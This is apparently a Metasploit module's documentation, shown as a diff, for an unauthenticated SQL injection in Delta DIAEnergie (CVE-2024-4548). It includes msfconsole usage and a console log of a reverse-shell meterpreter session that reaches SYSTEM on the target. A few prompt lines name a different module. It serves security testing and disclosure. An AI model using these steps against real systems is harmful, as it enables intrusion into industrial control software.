|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +**Vulnerability Description** |
| 4 | + |
| 5 | +This module exploits a SQL injection vulnerability in DIAEnergie <= v8.28.0 (CVE-2024-4548). |
| 6 | + |
| 7 | +An unauthenticated remote attacker can exploit this vulnerability to inject an arbitrary script through a SQL injection vulnerability, which |
| 8 | +can then be executed in the context of `NT AUTHORITY\SYSTEM`. The vulnerability is within the CEBC service, which listens by default on TCP |
| 9 | +port 928. It accepts various user-controlled data, including `RecalculateHDMWYC` messages, which are insufficiently validated before using |
| 10 | +them as part of a SQL query. |
| 11 | + |
| 12 | +Versions <= 1.10.1.8610 are affected. Tenable published [TRA-2024-13](https://www.tenable.com/security/research/tra-2024-13) to cover the |
| 13 | +security issues. |
| 14 | + |
| 15 | +**Vulnerable Application Installation** |
| 16 | + |
| 17 | +A trial version of the software can be obtained from [the vendor] |
| 18 | +(https://downloadcenter.deltaww.com/downloadCenterCounter.aspx?DID=39969&DocPath=1&hl=en-US). |
| 19 | +For the product to work correctly, SQL Server (e.g., SQL Server Express) needs to be installed. |
| 20 | + |
| 21 | +**Successfully tested on** |
| 22 | + |
| 23 | +- DIAEnergie v1.10 on Windows 10 22H2 |
| 24 | +- DIAEnergie v1.9 on Windows 10 22H2 |
| 25 | + |
| 26 | +## Verification Steps |
| 27 | + |
| 28 | +1. Install the SQL Server (Express) |
| 29 | +2. Install DIAEnergie |
| 30 | +3. Start `msfconsole` and run the following commands: |
| 31 | + |
| 32 | +``` |
| 33 | +msf6 > use exploit/windows/scada/diaenergie_sqli |
| 34 | +[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp |
| 35 | +msf6 exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP> |
| 36 | +msf6 exploit(windows/scada/mypro_cmdexe) > exploit |
| 37 | +``` |
| 38 | + |
| 39 | +You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`. |
| 40 | + |
| 41 | +## Scenarios |
| 42 | + |
| 43 | +Running the exploit against DIAEnergie v1.10 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the |
| 44 | +following: |
| 45 | + |
| 46 | +``` |
| 47 | +msf6 exploit(windows/scada/mypro_cmdexe) > exploit |
| 48 | +
|
| 49 | +[*] Started reverse TCP handler on 192.168.1.241:4444 |
| 50 | +[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable) |
| 51 | +[+] 192.168.1.245:928 - The target appears to be vulnerable. |
| 52 | +[*] 192.168.1.245:928 - Sending SQL injection... |
| 53 | +[*] 192.168.1.245:928 - Triggering script execution... |
| 54 | +[*] 192.168.1.245:928 - Cleaning up database... |
| 55 | +[+] 192.168.1.245:928 - Script successfully injected, check thy shell. |
| 56 | +[*] Sending stage (201798 bytes) to 192.168.1.245 |
| 57 | +[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400 |
| 58 | +
|
| 59 | +meterpreter > shell |
| 60 | +Process 6392 created. |
| 61 | +Channel 1 created. |
| 62 | +Microsoft Windows [Version 10.0.19045.4529] |
| 63 | +(c) Microsoft Corporation. All rights reserved. |
| 64 | +
|
| 65 | +C:\WINDOWS\system32>whoami |
| 66 | +whoami |
| 67 | +nt authority\system |
| 68 | +``` |
0 commit comments